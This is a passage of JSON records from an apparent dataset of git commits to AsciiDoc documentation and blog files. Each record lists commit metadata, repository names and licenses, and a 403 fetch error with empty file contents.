secondaries\n","repos":"advancedtelematic\/sota_client_cpp,advancedtelematic\/sota_client_cpp,advancedtelematic\/aktualizr,advancedtelematic\/aktualizr,advancedtelematic\/aktualizr,advancedtelematic\/aktualizr","old_file":"docs\/legacysecondary.adoc","new_file":"docs\/legacysecondary.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/advancedtelematic\/sota_client_cpp.git\/': The requested URL returned error: 403\n","license":"mpl-2.0","lang":"AsciiDoc"} {"commit":"8728dfc680d60f3482938f8c2876cc53301aab58","subject":"[docs] Add docs about disk usage due to sparse files","message":"[docs] Add docs about disk usage due to sparse files\n\nA few times users have been confused about the amount of space Kudu\nis using with the log block manager because Kudu uses sparse files.\nThis adds a quick bit of docs explaining the source of this\ndiscrepancy and showing how to get accurate numbers.\n\nChange-Id: I4e73d7d5f2edc8a2676f3207e06d29ec89f7e1a0\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/9817\nTested-by: Kudu Jenkins\nReviewed-by: Attila Bukor <53758272babe3057a5ff4ad51afd9bfd6e6014a1@cloudera.com>\nReviewed-by: Adar Dembo <866ca730bfc7f544e3ebce604ceeba4879f23df0@cloudera.com>\n","repos":"InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu","old_file":"docs\/troubleshooting.adoc","new_file":"docs\/troubleshooting.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e6a6d4c3e0929334dde7d2ffa36fdfb6e67eda7e","subject":"Update 2015-12-28-Angulartics-100-released.adoc","message":"Update 2015-12-28-Angulartics-100-released.adoc","repos":"timelf123\/timelf123.github.io,timelf123\/timelf123.github.io,timelf123\/timelf123.github.io,timelf123\/timelf123.github.io","old_file":"_posts\/2015-12-28-Angulartics-100-released.adoc","new_file":"_posts\/2015-12-28-Angulartics-100-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/timelf123\/timelf123.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"36b5989e61b076d8ff2b9ba0e811d83389c483b7","subject":"Update 2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","message":"Update 2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","new_file":"_posts\/2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"23180e03b1adef92cef4235279303cbb1ef299f4","subject":"Update 2018-04-13-deploy-by-kubernetes.adoc","message":"Update 2018-04-13-deploy-by-kubernetes.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-04-13-deploy-by-kubernetes.adoc","new_file":"_posts\/2018-04-13-deploy-by-kubernetes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d52c7f3de7ca955c5423a60af3a65cf78c1f31ca","subject":"Update 2018-04-13-Amazon-Echover.adoc","message":"Update 2018-04-13-Amazon-Echover.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-04-13-Amazon-Echover.adoc","new_file":"_posts\/2018-04-13-Amazon-Echover.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9336905344457dd41a2be661e0da8c9a738f6a6f","subject":"Update 2018-04-23-Crypto-Zombies.adoc","message":"Update 2018-04-23-Crypto-Zombies.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-04-23-Crypto-Zombies.adoc","new_file":"_posts\/2018-04-23-Crypto-Zombies.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1f20e23c4c72efd9f3d654bbfbfbd0d9c4acf082","subject":"Update 2016-12-30-Kleptography-in-RSA.adoc","message":"Update 2016-12-30-Kleptography-in-RSA.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-12-30-Kleptography-in-RSA.adoc","new_file":"_posts\/2016-12-30-Kleptography-in-RSA.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fa1db7e607fd715367222638778ab93e040f0c79","subject":"Update 2018-04-01-Why-did-you-do-that.adoc","message":"Update 2018-04-01-Why-did-you-do-that.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2018-04-01-Why-did-you-do-that.adoc","new_file":"_posts\/2018-04-01-Why-did-you-do-that.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"105f5d0554478b358d92986fa174387607b3f487","subject":"Update 2016-04-05-Llamada-para-el-sistema-operativo.adoc","message":"Update 2016-04-05-Llamada-para-el-sistema-operativo.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-05-Llamada-para-el-sistema-operativo.adoc","new_file":"_posts\/2016-04-05-Llamada-para-el-sistema-operativo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"921a53eef3691244cd872ee593069f2ae8c84d83","subject":"y2b create post Don't Buy The Wrong Hard Drive!","message":"y2b create post Don't Buy The Wrong Hard Drive!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-10-27-Dont-Buy-The-Wrong-Hard-Drive.adoc","new_file":"_posts\/2015-10-27-Dont-Buy-The-Wrong-Hard-Drive.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b65e9ac78559674e15de38fbae95deadda33affe","subject":"doc: glossary: defining ODP thread more precisely","message":"doc: glossary: defining ODP thread more precisely\n\nSigned-off-by: Christophe Milard <99616a981fa4477cda708a70f78076761c0c9f1c@linaro.org>\nReviewed-and-tested-by: Bill Fischofer <52f3c909d51cc5d355a68a403df6906b3c1a8f83@linaro.org>\nSigned-off-by: Maxim Uvarov <db4d16e02ae2d7493db430203537da8b2e34f290@linaro.org>\n","repos":"dkrot\/odp,nmorey\/odp,ravineet-singh\/odp,mike-holmes-linaro\/odp,erachmi\/odp,nmorey\/odp,dkrot\/odp,dkrot\/odp,ravineet-singh\/odp,nmorey\/odp,mike-holmes-linaro\/odp,erachmi\/odp,mike-holmes-linaro\/odp,ravineet-singh\/odp,erachmi\/odp,nmorey\/odp,mike-holmes-linaro\/odp,erachmi\/odp,ravineet-singh\/odp,dkrot\/odp","old_file":"doc\/glossary.adoc","new_file":"doc\/glossary.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nmorey\/odp.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"ddaeadca88a42d159fef835fb3597825437b0661","subject":"Update 2016-06-10-Ditirambo-contado-por-sus-cantantes-I-I.adoc","message":"Update 2016-06-10-Ditirambo-contado-por-sus-cantantes-I-I.adoc","repos":"ditirambo\/ditirambo.es,ditirambo\/ditirambo.es,ditirambo\/ditirambo.es,ditirambo\/ditirambo.es","old_file":"_posts\/2016-06-10-Ditirambo-contado-por-sus-cantantes-I-I.adoc","new_file":"_posts\/2016-06-10-Ditirambo-contado-por-sus-cantantes-I-I.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ditirambo\/ditirambo.es.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c79e5ae821c450ff8bebb82590f98cb598b64d0b","subject":"Add 2nd Chapter and 2 Sections","message":"Add 2nd Chapter and 2 Sections\n","repos":"mashengchen\/incubator-trafodion,mashengchen\/incubator-trafodion,mashengchen\/incubator-trafodion,mashengchen\/incubator-trafodion,mashengchen\/incubator-trafodion,mashengchen\/incubator-trafodion,mashengchen\/incubator-trafodion,mashengchen\/incubator-trafodion,mashengchen\/incubator-trafodion,mashengchen\/incubator-trafodion","old_file":"docs\/lob_guide\/src\/asciidoc\/_chapters\/work_with_lob.adoc","new_file":"docs\/lob_guide\/src\/asciidoc\/_chapters\/work_with_lob.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mashengchen\/incubator-trafodion.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4cbd1bf14c86eab943613a35f00b936220754727","subject":"Update 2016-08-09-TP.adoc","message":"Update 2016-08-09-TP.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-08-09-TP.adoc","new_file":"_posts\/2016-08-09-TP.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"402ff11a8b1d827660e1deaaa63b9dccba1d857e","subject":"Developer docs for modules and packages (#531)","message":"Developer docs for modules and packages (#531)\n\nCo-authored-by: David Smiley <ff0b55894fb4e3b5483d0e086b4d08bed4d08380@apache.org>\r\nCo-authored-by: Eric Pugh <15dca3954de5ad1a330286360fd33b30a2572191@opensourceconnections.com>\r\nCo-authored-by: Houston Putman <aeb660d59a4b7c00bbc36a6341efe038d538789c@gmail.com>","repos":"apache\/solr,apache\/solr,apache\/solr,apache\/solr,apache\/solr","old_file":"dev-docs\/plugins-modules-packages.adoc","new_file":"dev-docs\/plugins-modules-packages.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apache\/solr.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ffa9a5e61e99f874e1b5ddc414e44f4e7f5edba3","subject":"Update 2015-11-05-Hello.adoc","message":"Update 2015-11-05-Hello.adoc","repos":"the-101\/the-101.github.io,the-101\/the-101.github.io,the-101\/the-101.github.io","old_file":"_posts\/2015-11-05-Hello.adoc","new_file":"_posts\/2015-11-05-Hello.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/the-101\/the-101.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1df8c850e534d8b42f0fe749f08f383c0e5cd4a9","subject":"Update 2016-05-06-Draft.adoc","message":"Update 2016-05-06-Draft.adoc","repos":"fadlee\/fadlee.github.io,fadlee\/fadlee.github.io,fadlee\/fadlee.github.io,fadlee\/fadlee.github.io","old_file":"_posts\/2016-05-06-Draft.adoc","new_file":"_posts\/2016-05-06-Draft.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fadlee\/fadlee.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3fb21c1b3d92592a39a7679e84b5d1661e27ff88","subject":"Update 2015-12-28-AirHacX-Tracking-Unit.adoc","message":"Update 2015-12-28-AirHacX-Tracking-Unit.adoc","repos":"AirHacX\/blog.airhacx.com,AirHacX\/blog.airhacx.com,AirHacX\/blog.airhacx.com","old_file":"_posts\/2015-12-28-AirHacX-Tracking-Unit.adoc","new_file":"_posts\/2015-12-28-AirHacX-Tracking-Unit.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/AirHacX\/blog.airhacx.com.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"48418d4f782d722288c58e9c0d2df12b6d33bc5a","subject":"Update 2016-03-29-Ingenieria-social-S-E.adoc","message":"Update 2016-03-29-Ingenieria-social-S-E.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-29-Ingenieria-social-S-E.adoc","new_file":"_posts\/2016-03-29-Ingenieria-social-S-E.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e72dcb011afcb9dca54a4f421628198fa8e61753","subject":"Added a README file to the logging directory.","message":"Added a README file to the logging directory.\n\nThis file contains some information about the modules below this\ndirectory and why they are needed.\n","repos":"oheger\/LineDJ","old_file":"logging\/README.adoc","new_file":"logging\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oheger\/LineDJ.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"04e1063c6f0a3fb82f2284d84d4a03c76481a3f1","subject":"Update 2017-07-28-Friday-July-28th-2017.adoc","message":"Update 2017-07-28-Friday-July-28th-2017.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2017-07-28-Friday-July-28th-2017.adoc","new_file":"_posts\/2017-07-28-Friday-July-28th-2017.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"746a45863238ded7eba9c971d6684a3f7aa20d54","subject":"Moved the readme into the project","message":"Moved the readme into the project\n\nconverted to asciidoc\n","repos":"resilience4j\/resilience4j,mehtabsinghmann\/resilience4j,drmaas\/resilience4j,goldobin\/resilience4j,javaslang\/javaslang-circuitbreaker,drmaas\/resilience4j,RobWin\/javaslang-circuitbreaker,resilience4j\/resilience4j,RobWin\/circuitbreaker-java8","old_file":"resilience4j-retrofit\/README.adoc","new_file":"resilience4j-retrofit\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/resilience4j\/resilience4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5c8eb45747a3a2279e3eff2397b69aa08c09bc73","subject":"add requirements page","message":"add requirements page\n","repos":"jasontedor\/elasticsearch-hadoop,holdenk\/elasticsearch-hadoop,pranavraman\/elasticsearch-hadoop,Gavin-Yang\/elasticsearch-hadoop,cgvarela\/elasticsearch-hadoop,girirajsharma\/elasticsearch-hadoop,takezoe\/elasticsearch-hadoop,xjrk58\/elasticsearch-hadoop,yonglehou\/elasticsearch-hadoop,puneetjaiswal\/elasticsearch-hadoop,lgscofield\/elasticsearch-hadoop,huangll\/elasticsearch-hadoop,samkohli\/elasticsearch-hadoop,sarwarbhuiyan\/elasticsearch-hadoop,trifork\/elasticsearch-hadoop,kai5263499\/elasticsearch-hadoop,costin\/elasticsearch-hadoop,nfouka\/elasticsearch-hadoop,aie108\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop","old_file":"docs\/src\/reference\/asciidoc\/intro.adoc","new_file":"docs\/src\/reference\/asciidoc\/intro.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pranavraman\/elasticsearch-hadoop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f6c7affbb02d475e29b35f8147c8282de7979d71","subject":"Removed section on Swig since we're not using it anymore","message":"Removed section on Swig since we're not using it anymore","repos":"EMCWorld\/2015-REST,EMCWorld\/2015-REST,EMCWorld\/2015-REST,EMCWorld\/2015-REST","old_file":"lab\/intro.adoc","new_file":"lab\/intro.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/EMCWorld\/2015-REST.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"879d5559de651f4014b35ffcca8658001b9f8ca2","subject":"Fix location of HTML file","message":"Fix location of HTML file","repos":"EMCWorld\/2015-REST,EMCWorld\/2015-REST,EMCWorld\/2015-REST,EMCWorld\/2015-REST","old_file":"lab\/login.adoc","new_file":"lab\/login.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/EMCWorld\/2015-REST.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b2e1b1181f90504bb6f125cfeef82c1cb4e33ac4","subject":"Update 2015-09-20-Python-re-module.adoc","message":"Update 2015-09-20-Python-re-module.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-20-Python-re-module.adoc","new_file":"_posts\/2015-09-20-Python-re-module.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bc26eb50be70f39ef1e99a5624219e70f6939b48","subject":"Update 2015-06-15-NodeJSs-event-loop.adoc","message":"Update 2015-06-15-NodeJSs-event-loop.adoc","repos":"ragingsmurf\/ragingsmurf.github.io,ragingsmurf\/ragingsmurf.github.io,ragingsmurf\/ragingsmurf.github.io","old_file":"_posts\/2015-06-15-NodeJSs-event-loop.adoc","new_file":"_posts\/2015-06-15-NodeJSs-event-loop.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ragingsmurf\/ragingsmurf.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"edb99127518bd4e11fc46e9bb6b2d690fc407f52","subject":"Update 2015-06-18-Teilen-ist-wichtig.adoc","message":"Update 2015-06-18-Teilen-ist-wichtig.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-06-18-Teilen-ist-wichtig.adoc","new_file":"_posts\/2015-06-18-Teilen-ist-wichtig.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"60b5d38c60b2c7ec21081e5bf3081c9c0f5a77bd","subject":"JDK install","message":"JDK install\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Best practices\/Various.adoc","new_file":"Best practices\/Various.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e8c76def7554cc62c548c10ce6b040a1b1d81049","subject":"chore(Ch4): add index","message":"chore(Ch4): add index\n","repos":"genie88\/promises-book,purepennons\/promises-book,tangjinzhou\/promises-book,azu\/promises-book,wenber\/promises-book,liyunsheng\/promises-book,xifeiwu\/promises-book,cqricky\/promises-book,wangwei1237\/promises-book,dieface\/promises-book,charlenopires\/promises-book,tangjinzhou\/promises-book,mzbac\/promises-book,azu\/promises-book,oToUC\/promises-book,mzbac\/promises-book,liubin\/promises-book,cqricky\/promises-book,xifeiwu\/promises-book,charlenopires\/promises-book,xifeiwu\/promises-book,oToUC\/promises-book,tangjinzhou\/promises-book,wangwei1237\/promises-book,dieface\/promises-book,sunfurong\/promise,cqricky\/promises-book,purepennons\/promises-book,mzbac\/promises-book,oToUC\/promises-book,purepennons\/promises-book,genie88\/promises-book,liubin\/promises-book,wangwei1237\/promises-book,sunfurong\/promise,liyunsheng\/promises-book,lidasong2014\/promises-book,lidasong2014\/promises-book,genie88\/promises-book,wenber\/promises-book,charlenopires\/promises-book,liyunsheng\/promises-book,dieface\/promises-book,sunfurong\/promise,wenber\/promises-book,liubin\/promises-book,azu\/promises-book,azu\/promises-book,lidasong2014\/promises-book","old_file":"Ch4_AdvancedPromises\/readme.adoc","new_file":"Ch4_AdvancedPromises\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xifeiwu\/promises-book.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"656fb6aecf8452f5e43617df377b764461d4fe5c","subject":"blog: added persistence and distributed computing","message":"blog: added persistence and distributed computing\n","repos":"gAmUssA\/hazelcast-mongo-experiments","old_file":"Hazelcast For MongoDB users.adoc","new_file":"Hazelcast For MongoDB users.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gAmUssA\/hazelcast-mongo-experiments.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"20d9254852b3259ab0d4390409fdceaa6dbb6e0b","subject":"Update 2013-12-26-Episode-3-Total-Chaos.adoc","message":"Update 2013-12-26-Episode-3-Total-Chaos.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2013-12-26-Episode-3-Total-Chaos.adoc","new_file":"_posts\/2013-12-26-Episode-3-Total-Chaos.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4b356ddc7ea9fc01783daaf18f826e9b6d84d40a","subject":"Update 2015-05-30-My-Asyncjs-Cheatsheet.adoc","message":"Update 2015-05-30-My-Asyncjs-Cheatsheet.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7e458a1e0f9da9ef3c4a0cc49817b6a4b6f744ef","subject":"Update 2015-10-25-Middleman.adoc","message":"Update 2015-10-25-Middleman.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-10-25-Middleman.adoc","new_file":"_posts\/2015-10-25-Middleman.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1f82667324740246502f463230bdf28300b55627","subject":"Update 2018-09-10-Firestore.adoc","message":"Update 2018-09-10-Firestore.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-10-Firestore.adoc","new_file":"_posts\/2018-09-10-Firestore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6ae0a96e46301dbecc6217de887647df61a4a805","subject":"Update 2019-04-22-Cloud-Run.adoc","message":"Update 2019-04-22-Cloud-Run.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-04-22-Cloud-Run.adoc","new_file":"_posts\/2019-04-22-Cloud-Run.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cc9bc8857b534f8a05cb249d35a33ab92d3058d9","subject":"Update 2015-03-01-Notes-from-Mathiass-Unicode-talk.adoc","message":"Update 2015-03-01-Notes-from-Mathiass-Unicode-talk.adoc","repos":"simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io","old_file":"_posts\/2015-03-01-Notes-from-Mathiass-Unicode-talk.adoc","new_file":"_posts\/2015-03-01-Notes-from-Mathiass-Unicode-talk.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simevidas\/simevidas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"66b2162e9516ec36699e62d9edde5543c37a82eb","subject":"Delete 2016-5-13-Engineer-Career-Path.adoc","message":"Delete 2016-5-13-Engineer-Career-Path.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"2016-5-13-Engineer-Career-Path.adoc","new_file":"2016-5-13-Engineer-Career-Path.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d033ad0fe9df8b5a88b85b0f30421fdc8c6af2b2","subject":"Update 2015-05-18-uGUI.adoc","message":"Update 2015-05-18-uGUI.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-05-18-uGUI.adoc","new_file":"_posts\/2015-05-18-uGUI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d55c3a2034d8f0eb8a5b48dabd4e9fecbdfaa0f7","subject":"Update 2016-05-16-test.adoc","message":"Update 2016-05-16-test.adoc","repos":"sgalles\/sgalles.github.io,sgalles\/sgalles.github.io,sgalles\/sgalles.github.io,sgalles\/sgalles.github.io","old_file":"_posts\/2016-05-16-test.adoc","new_file":"_posts\/2016-05-16-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sgalles\/sgalles.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"15d99e2958d697ec19a4f09c32ef7478174841fe","subject":"Update 2016-06-24-Kitchen-Sink.adoc","message":"Update 2016-06-24-Kitchen-Sink.adoc","repos":"fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io","old_file":"_posts\/2016-06-24-Kitchen-Sink.adoc","new_file":"_posts\/2016-06-24-Kitchen-Sink.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fqure\/fqure.github.io.git\/': The requested URL returned error: 